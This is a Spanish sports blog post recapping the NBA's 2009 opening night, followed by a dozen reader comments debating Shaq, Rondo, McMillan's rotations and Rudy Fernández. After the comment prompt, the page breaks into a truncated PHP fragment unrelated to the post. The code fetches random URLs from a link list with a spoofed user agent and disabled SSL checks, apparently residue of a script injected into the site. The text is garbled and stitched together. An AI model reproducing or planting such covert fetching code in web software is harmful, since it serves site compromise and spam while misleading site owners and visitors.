Opening Season (27/10/2009)

28 de October de 2009 por TheDeerHunter

Noche histórica en la que pudimos ver a Pau Gasol recogiendo en chándal el anillo de campeón. Decimoquinto título para los Lakers. Allí estaban presentes Jerry West, Norm Nixon, Jamaal Wilkens, A.C. Green, Rick Fox, Michael Cooper, Robert Horry o Magic Johnson, todos representantes de los anteriores equipos campeones de la ciudad. Bien podría haberlo hecho en traje en honor a tales ilustres testigos pues tardará todavía algunos días en debutar a causa de unas molestias en los isquiotibiales. Para muchos de nosotros es un momento largamente esperado, además de significar el pistoletazo de salida a una temporada que parecía no iba a llegar nunca.

Pero antes de toda la parafernalia bucólico-festiva, la competición en sí ya había arrancado a todo trapo.

En Cleveland, LeBron abrió con una exhibición de 38 puntos, 4 rebotes, 8 asistencias y 4 de los tapones más brutales que uno haya podido ver en la vida. Aunque parezca increíble no sirvió para lograr la victoria igualando, a las primeras de cambio, el registro de derrotas en casa de toda la pasada regular. Más que la anécdota de un partido más que muy posiblemente apenas tendrá relevancia y contra un rival como los Celtics, preocupan los anunciados síntomas de mono-dependencia. Si el termómetro de este equipo pueden ser Shaq y Sweet Mo ayer no demostraron ser más que comparsas del “único”. Los Celtics se limitaron a defender bien y a jugar juntos, sin deslumbrar nadie en concreto. Buen debut de Sheed, eso sí… Posiblemente alguno de sus triples marcó la exigua diferencia que supieron tranquilamente administrar. Otro gran planteamiento más de Rivers, hay que destacarlo.

Después por fin pudimos volver a ver al “Agente Zero”, como si no hubiera pasado nada, armándola como siempre supo en casa de Cuban. No hace mucho el duelo Arenas-Kidd hubiera llenado gradas por sí mismo. Ahora a priori nos parecía un duelo de geriátrico, pero sólo lo fue por el lado local. En Dallas funcionó el de siempre y un poquito de José Barea. Marion no tuvo un mal debut en lo individual, pero no entendemos (aunque nos lo imaginemos) cómo es posible que con él se produjeran las peores diferencias. Demasiado de menos se echó a Josh Howard, del que tampoco nadie podrá esperar que sea El Mesías cuando vuelva a estar disponible. Extraordinaria aportación de Foye y Blatche desde el banquillo de los Wizards, por cierto.

Los Blazers empezaron sólidos a pesar de las malas noticias con Batum. Su batería de aleros sigue siendo sobresaliente, con Roy, Outlaw, Rudy y recuperando a Webster (de titular) haciendo un excelente trabajo ante la buena defensa de perímetro que tiene Houston. Por dentro Oden sólo se bastó para anular el bajo juego interior de los Rockets. Andre Miller fue reserva de Blake, por si alguien esperaba lo contrario. Para celebrarlo Brooks fue el mejor de su equipo, aunque no pudieran hacer nada para dar la sorpresa.

Por último, los Lakers, como se esperaba, ganaron a los Clippers sin Griffin. Baron Davis sí jugó… pero casi mejor que no lo hubiera hecho. Kobe y Bynum se bastaron para llevar el partido a su favor. Quitando estos dos, junto Artest y Odom… el resto vacío cósmico. Por los Clippers, buen partido de Kaman y Eric Gordon.

PREMIOS

MVP: Los Lakers empiezan tan fuertes como acabaron la temporada. La ausencia de Pau Gasol se notó menos gracias a los partidazos de Andrew Bynum (26 puntos y 13 rebotes) y Kobe Bryant (33 puntos y 8 rebotes). Cuando vuelva el español esto puede ser un festival.

Rookie: Ante la lesión de Blake Griffin al que todos esperábamos con mucho interés, tan sólo saltó a la cancha un rookie y pasó más bien desapercibido. Chase Budinger jugó 15 min. para los Rockets en los que anotó 6 puntitos.

Sorpresa: Por un lado los Wizards, comandados por un Gilbert Arenas que ha vuelto por la puerta grane (29 puntos y 9 asistencias) y 2 suplentes que esperan hacer una gran temporada como son Andray Blatche (20-7) y Randy Foye (19 puntos). Mención especial para el máximo anotador de los Blazers, Travis Outlaw.

Decepción: Van de bases las decepciones de hoy y es que entre Baron Davis y Jason Kidd no fueron capaces de anotar más de 6 puntos con un 3 de 16 en tiro conjunto. Muy malas noticias para sus respectivos equipos.

Esfuerzo en vano: Si Cleveland no gana Lebron James aparece en esta sección casi con la misma probabilidad que cuando tiras una manzana hacia arriba esta caiga al suelo. 38 puntos, 8 asistencias y 4 tapones para un angelito que no está acostumbrado a perder en liga regular.

RAZONES PARA TRASNOCHAR

Con 12 partidos esta próxima madrugada, quien no encuentre razones para trasnochar es porque no quiere. Empieza el programa a medianoche con el estreno de Calderón y los Raptors, ante el difícil reto de frenar la ira de LeBron tras la derrota contra los Celtics. A la 1h00, uno de los grandes duelos que ofrece la Conferencia Oeste, Hornets-Spurs. A la misma hora debutarán Marc Gasol y Sergio Rodríguez ante Pistons y Thunder respectivamente. Y a continuación, a partir de las 3h30, recomendamos un enfrentamiento entre equipos de la Northwest, Jazz-Nuggets. Lo dicho, razones de sobra para trasnochar y disfrutar de esta segunda jornada de regular season.

Comenta

12 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Pues vi la primera parte del Cavs-Celtics y Shaq estuvo muy bien, supongo que no tienen intención de forzarlo en la regular y menos aun en el primer partido, pero si hubiesen castigado a Sheed en el poste bajo como el mismo Sheed les castigó desde la larga distancia habrian tenido mas posibilidades de ganar.

    Me parece una locura que Blake juegue por delante de Miller, vamos no es que me lo parezca, es que lo es.

    Espero que no tarde mucho Pau en volver para ir viendo como queda la rotación de Lakers.

    Mola ver a Arenas de vuelta, mola mucho.

      Citar

  2. sergio dice:
    #2

    Yo tambien estoy de acuerdo con que O’neal cumplio de sobra en los minutos que estuvo en pista. Un doble-doble es algo que no ha promediado en las ultimas temporadas ni Ilgauskas ni Varejao. Y si aparte tenemos en cuenta el poder de intimidacion de un tipo de 150 kg…. me parece que no anda mal. Lo que si preocupa es que ya casi todos los entrenadores saben que para parar a los Cavs no tienes que parar a LeBron sino no dejar que entren en juego el resto de segundas espadas. Desde luego Doc Rivers sabia lo que se hacia (por cierto que el año pasado los Cavs perdieron 2 partidos en casa, el ultimo partido de regular fue el segundo si no me equivoco)

    En cuanto al Mavs-Wizards pues dentro de lo que cabe no fue una sorpresa…. Dirk siendo quien es, Kidd con el plan de pensiones siendo ninguneado por cualquier base en buen estado de forma, Dampier haciendo que su equipo juegue con 4,…. Desde luego estos Mavs son como el Atleti en el futbol, por mucho que prometan su final acaba siendo el mismo.

    Yo tampoco entiendo lo de Blake por encima de Miller. Solo lo entenderia desde una perspectiva de tiro (tampoco gran diferencia) que es bien contrarrestada por los aleros de Portland, donde hay tiradores de todos los colores (literalmente). Miller liberaria a Roy de subir el balon muchas veces y, simplemente con bloqueos y cortes, crearia espacio para sus compañeros. Por cierto, no ha sido mal partido de Oden pero solo 2 puntos… jumm

    Y ya terminando con los Lakers pues creo que con poco que aporten los suplentes deberian pasar por encima de casi todos. Dar la mitad de tiempo a Farmar y FIsher deberia ser algo a tener en cuenta por parte del “Zen Master”. Grato regreso el de Bynum y los demas en su linea. Que Artest, Odom, Bynum y Kobe metan 85 de 99 puntos es para dudar del banquillo y para pensar en los 16-18 que deberia añadir Pau.

      Citar

  3. sergio dice:
    #3

    Por cierto, Rondo se esta acostumbrando a recibir tapones descomunales de LeBron al contragolpe… el de esta noche si no es Top10 al final de temporada…..

      Citar

  4. aro_pasado_no_newtoniano dice:
    #4

    Primer buen partido de Kaman delante de Bynum que recuerde.

    Y el anillo de Ariza ¿cuándo se lo darán?

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    y los que recibieron el anillo ¿se lo quitaron? o ¿se puede impugnar el partido?

      Citar

  6. Txusma dice:
    #6

    Madre del amor hermoso. Vaya tapón!

      Citar

  7. Jabho dice:
    #7

    Shaq estuvo correcto, bien en la primera mitad y más regulero en la 2ª. En defensa es un muro. Los Celtics estuvieron muuuuuy bien. Al 100% los Celtics creo que son mejores que los Cavs y por eso anoche ganaron. En los Celtics será dificil ver partidazos individuales, pero cada uno hizo su trabajo. Muy serios todos, empezando por Garnett, Rondo bien a pesar del tapón, el banco comandado por Daniels y Sheed, Allen, Perkins y Pierce que estaba más flojo cogió el partido en los últimos minutos y se lo llevó a casa ¡¡¡craaaaack!!!!!

    Imagen buena de los Cavs que palmaran pocos partidos en casa y buenísima de los C´s. No sé si les durará la gasolina, pero si les durá….

      Citar

  8. kantonyo dice:
    #8

    No he escrito antes, por que tenia tal mono de NBA, que me he visto tres partidos y no queria saber resultados.. jajajajaja

    En el Cavs-Celtics, creo que se ha impuesto la humildad y la constancia de Boston. Creo que Cavs ha salido sobrado, y más aún cuando se han puesto casi de 20 en los primeros minutos. A pesar de perder, nose por que no me han dejado mala imagen los Cavs. Por parte de Boston, cada dia estoy más enamorado de Rajon Rondo, me ha sorprendido mirar después las estadisticas y ver que no han sido del otro mundo, pero en el partido pensé que habia hecho 20 puntos, 20 asitencias, 20 rebotes y 10 robos de balón ….

    En el Blazers-Rockets, en ningún momento Houston ha puesto en apuros a Porltand. Estoy con vosotros en que Miller tendría que ser títular, pero a McMIllan le ha salido bien la jugada, porque el equipo suplente ha sido al final el que ha decidido el partido, con Rudy, Miller y Outlaw. Posiblemente me equivoque, porque hablo de memoria, pero creo que los tres balones que se ha jugador Oden en ataque, han sido a pases de Rudy, porque coño no le pasan más balones???? …. Y por cierto, un detalle muy importante que se os ha escapado (no es muy común), Rudy ha jugado minutos de base, y eso que estaban Blake y Miller, un dato curioso…….

    En el Clippers-Lakers, no destaco nada del partido, lo único acordarme de lo inutiles que son el Diario As, respecto a la NBA. en el periodico de ayer dedicaron 3 páginas al inicio de la NBA, haciendo hincapie en el LAK-LAC. En una de las infografías pusieron los quintetos iniciales, me quedé alucinado cuando vi esto: BASE: Butler, ESCOLTA: Baron Davis, ALERO: Smith, ALA-PIVOT: Thornton, PÍVOT: Griffin. No dieron ni una, pero además olvidaron meter a Camby en los suplente, yo pensé que estaba incluso lesionado… que triste!! Como un especialista de la NBA, no sabe que Griffin está lesionado….

      Citar

  9. sergio dice:
    #9

    Yo diria mas bien que McMillan jugo sin base xD

      Citar

  10. L.Casei dice:
    #10

    Viva McMILLAN !!!!
    Rudy hasta de base, con 28 minutitos saliendo de lesión… Sergio, eso es un entrenador conservador !!!
    Lo bueno de la lesión de Batum es que los Webster, Outlaw y sobre todo Rudy van a tener más minutos.
    En D+ no paran de decir que si Rudy va a jugar menos este año, que si los ficahajes lo demuestran… Menos mal que no confían en él…
    Y los nuevos : dos bases puros (Miller y Mills) y tres jugadores interiores, dos de ellos rookies: Cunningham (poco va a jugar de 3), Pendergraph y Juwan Howard. Ni un escolta, ni un alero.
    Si alguien lo entiende, que lo explique..

    In “Mac” we trust .. jeje

      Citar

  11. sergio dice:
    #11

    Si fichan a Miller como panacea del equipo (por fin un base puro) y ponen a Rudy de base que no ha jugado en su vida y ultimamente ni hace entradas… ya me diras tu lo visionario que es. Eso conlleva previsibilidad a raudales… si no fijate en el numero de perdidas. Y mira Miller: 7 asistencias en 25 minutos

    Tampoco entiendo como ganando de 20 en el ultimo cuarto Roy acaba jugando 40 minutos habiendo gente en su puesto deseando hacerlo bien y tener minutos.

    Quizas siempre le busque el fallo porque no termino de tragar al Sr. McMenu pero hace cosas algo raras…

      Citar

  12. Óscar dice:
    #12

    Yo he visto el Portland-Houston y Rudy no ha jugado de base ni un segundo. Lo más que ha hecho ha sido subir un balón en el 3ª cuarto cuando presionaban a Roy… que sí ha jugado e 1, 2 y 3.
    Sí me ha sorprendido (y gustado) en ese partido la cantidad de variantes que ha utilizado McMillan, como poner varios minutos juntos a Blake, Mller y Roy/Rudy. También poner a Aldridge como “5”, junto a 3 pequeños y Outlaw de “4”, para contrarrestar el juego rápido de Houston. Oden, gigante en su aro y nada participativo ni ambicioso en ataque. Poco a poco. Lo mejor, la defensa y la cantidad de jugadores capaces de taponar a los rivales: 12 pintxos de merluza.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>